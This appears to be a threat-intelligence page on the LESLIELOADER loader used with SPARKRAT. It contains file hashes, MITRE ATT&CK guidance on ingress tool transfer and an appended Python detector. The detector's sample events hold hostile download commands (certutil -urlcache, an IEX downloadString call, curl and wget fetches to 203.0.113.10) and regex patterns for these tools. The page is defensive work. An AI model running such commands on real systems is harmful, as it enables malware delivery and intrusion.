SOC Incident Toolkit
Digital Deception: The LESLIELOADER Campaign's Mastery of Malware Misdirection

Tags: SPARKRAT Loader Update, Cyber Campaign SPARKRAT, Ongoing Cyber Threats, New Malware Loader

Cybersecurity researchers found that the SPARKRAT malware was deployed through a previously undocumented Golang installer, which let it execute undetected on target systems. Although the SPARKRAT project has been discontinued, the tool is still being modified for use in targeted attacks, most notably in the "DRAGONSPARK" campaign against East Asian organizations.

Indicators of Compromise

Hashes (30)

1e0d10e17bf5fc2b1dd7cfc717767d87e5fd448994445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a61019064ca0d50308013957a3da3fc60a62649c405fd9dbf7b184b18e73333ddf23e0bcb5d46ffed1ec57b24867499bd15f5a0487443e1f0f4c1fa578d917e851560ba44741ddd031d4741e9ef92f606753ea4e95b9e161173a2a82c18ffd1f8206d852ec45da0ca70a9b71652cc95d51665f7ad568294bd5652c395a119bccd613e9b4b8cab11421eb4731c16cf3c34ca2b3f2a758d5e112f877b90a18b3e146c8add02df61720ffee7a6730c029da45bddba2ec9eace7359e1ee964b44560e9062bb9983e03a0f46cd40a861f7dc3e4efd1397b9b474168dc322a75a551bfb3fa8ded12afe1b18b0e7dcc4903fff3a7dc2a2b6c3d111c2f836e7b4d13ed082b8dea89c9b36dbca2f3260c62c1180720be599886e56191be9d4b1822dacec4d8dd3e99524d1042f6834b5d5af6fc8361d25eb3c5e0925c25bfed3eb9ebc12604edee0aeb4c8bc2f2a37e9fd1c77ebda33b5756509a726ddb42d41a59e3e5c9bb234479ce05cd1923ef9754911cc14e9b3e5d500e19151175a49cd2762810d0e9bd0187e8a29a0ad3e84281028e8aec44723249a5da2363f63511dc1d46742a9afb09e51294bcefa6a950326688c6e67b13facbf8ecdcffb5ba48002f13975f23851a3ec80547aa71d6953ce7aad42af3ba4a87699c80dd0b77f2dc04fcb24034feb26ed8bb0721da93f55d74ea8347373946abdf245f3773d1d42b76e1051c6ad0c832dc1c6bcd7158f4a0687f1f7d84c9c3c513b0e43e24c197844f1275df73f45803b1a740d4dae565f6de06bac388f2cd6df454469c+10 more

Notes

CONCLUSION

The discovery of LESLIELOADER, closely tied to the SPARKRAT malware, underlines a plain fact about the field: the threat landscape evolves quickly, driven by attackers' persistent creativity in finding ways around security controls. LESLIELOADER's capabilities, which let it bypass defences and quietly hide inside legitimate system processes, point to a marked escalation in intrusion tradecraft. Security teams therefore need to keep improving detection and defence mechanisms. Countering threats of this kind requires vigilance, but also a proactive and collaborative approach: sharing findings and strengthening defences across the security community.

Mitigation

MITIGATIONS

Below are some of the methods used by threat actors within this campaign.

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as FTP. Once present, adversaries may also transfer or spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various web services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.

Mitigations

ID: M1031 (https://attack.mitre.org/mitigations/M1031)
Mitigation: Network Intrusion Prevention
Description: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware, or unusual data transfer over known protocols like FTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely differ across malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. [510] (https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf)

Detection

ID: DS0017 (https://attack.mitre.org/datasources/DS0017)
Data Source: Command
Data Component: Command Execution
Detects: Monitor executed commands and arguments for suspicious activity associated with downloading external content.

ID: DS0022 (https://attack.mitre.org/datasources/DS0022)
Data Source: File
Data Component: File Creation
Detects: Monitor for file creation and for files transferred into the network.

ID: DS0029 (https://attack.mitre.org/datasources/DS0029)
Data Source: Network Traffic
Data Component: Network Connection Creation
Detects: Monitor for newly constructed network connections sent to or received from untrusted hosts, or that create files on the system; either may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Data Component: Network Traffic Content
Detects: Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal or unknown domains and IPs.

Data Component: Network Traffic Flow
Detects: Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication, or have never been seen before, are suspicious.
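The Command Execution and Network Traffic Flow rows above describe what to monitor but not how a check looks in practice. The following is an added example written for this page; it is not code from the SOC Incident Toolkit, from the campaign report, or from MITRE. It flags process-creation events whose command line drives one of the download utilities named in the Ingress Tool Transfer text at a destination that is not on an allowlist, and separately flags flows where a client sends far more than it receives. The sample events, the flow summaries, the 203.0.113.10 address (a documentation range), the trusted-host and known-uploader allowlists and the ratio thresholds are all constructed assumptions for the example.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 style); not campaign data.
# Command lines use the utilities named in the Ingress Tool Transfer text plus benign noise.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": "certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\\Users\\Public\\update.bin"},
    {"host": "ws01", "cmd": "powershell.exe -c IEX(New-Object Net.WebClient).downloadString('http://203.0.113.10/a.ps1')"},
    {"host": "ws02", "cmd": "powershell.exe Invoke-WebRequest -Uri https://203.0.113.10/tool.exe -OutFile C:\\ProgramData\\tool.exe"},
    {"host": "srv03", "cmd": "curl -o /tmp/.x http://203.0.113.10/x"},
    {"host": "srv03", "cmd": "wget -q http://203.0.113.10/x -O /tmp/.x"},
    {"host": "ws02", "cmd": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"host": "srv03", "cmd": "curl -s https://internal.corp.example/health"},
]

# Constructed per-flow byte counts over a window (client sent vs. received); not campaign data.
SAMPLE_FLOWS = [
    {"host": "ws01", "process": "update.bin", "dst": "203.0.113.10", "sent": 52_000_000, "recv": 120_000},
    {"host": "ws02", "process": "chrome.exe", "dst": "203.0.113.50", "sent": 300_000, "recv": 9_000_000},
    {"host": "srv03", "process": "backup-agent", "dst": "10.0.0.5", "sent": 80_000_000, "recv": 200_000},
]

# Assumed allowlists: destinations and processes an environment has already vetted.
TRUSTED_HOSTS = frozenset({"internal.corp.example"})
KNOWN_UPLOADERS = frozenset({"backup-agent"})

# Download utilities from the Ingress Tool Transfer text, as regexes over the lower-cased command line.
DOWNLOAD_UTILITY_PATTERNS = {
    "certutil": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache"),
    "powershell_webclient": re.compile(r"net\.webclient.*download(string|file)"),
    "powershell_iwr": re.compile(r"\binvoke-webrequest\b|\biwr\b"),
    "curl": re.compile(r"\bcurl\b"),
    "wget": re.compile(r"\bwget\b"),
    "scp_sftp_tftp_rsync": re.compile(r"\b(scp|sftp|tftp|rsync)\b"),
    "finger": re.compile(r"\bfinger\b"),
}
# Captures the host part of an http/https/ftp URL so it can be checked against the allowlist.
URL_PATTERN = re.compile(r"\b(https?|ftp)://([^\s/'\"]+)", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    utility: str
    destination: str
    cmd: str


def detect_ingress_tool_transfer(events, trusted_hosts=frozenset()):
    """Return one Finding per event whose command line invokes a download utility
    against a destination that is not allowlisted (DS0017 Command Execution)."""
    findings = []
    for ev in events:
        cmd = ev["cmd"]
        lowered = cmd.lower()
        utility = next((name for name, pat in DOWNLOAD_UTILITY_PATTERNS.items()
                        if pat.search(lowered)), None)
        if utility is None:
            continue
        m = URL_PATTERN.search(cmd)
        destination = m.group(2).lower() if m else ""
        if destination in trusted_hosts:
            continue  # vetted internal endpoint; suppress to keep the alert actionable
        findings.append(Finding(ev["host"], utility, destination, cmd))
    return findings


def flag_uncommon_flows(flows, known_uploaders=frozenset(), min_ratio=10.0, min_sent=1_000_000):
    """Return (host, process, dst, ratio) for flows where the client sends at least
    min_ratio times more than it receives and at least min_sent bytes in total
    (DS0029 Network Traffic Flow), skipping processes known to upload legitimately."""
    flagged = []
    for f in flows:
        if f["process"] in known_uploaders:
            continue
        ratio = f["sent"] / max(f["recv"], 1)  # guard against a zero receive count
        if f["sent"] >= min_sent and ratio >= min_ratio:
            flagged.append((f["host"], f["process"], f["dst"], round(ratio, 1)))
    return flagged


if __name__ == "__main__":
    for f in detect_ingress_tool_transfer(SAMPLE_EVENTS, TRUSTED_HOSTS):
        print(f"[ingress-tool-transfer] {f.host} {f.utility} -> {f.destination or '?'}: {f.cmd}")
    for host, proc, dst, ratio in flag_uncommon_flows(SAMPLE_FLOWS, KNOWN_UPLOADERS):
        print(f"[uncommon-flow] {host} {proc} -> {dst} sent/recv ratio {ratio}")
```

On the constructed sample the command-line check flags five events and suppresses the internal health probe, and the flow check flags only the workstation upload once the backup agent is allowlisted. Both allowlists are the tuning knobs: without them, ordinary curl use and backup traffic would drown the alerts the rows above are meant to surface.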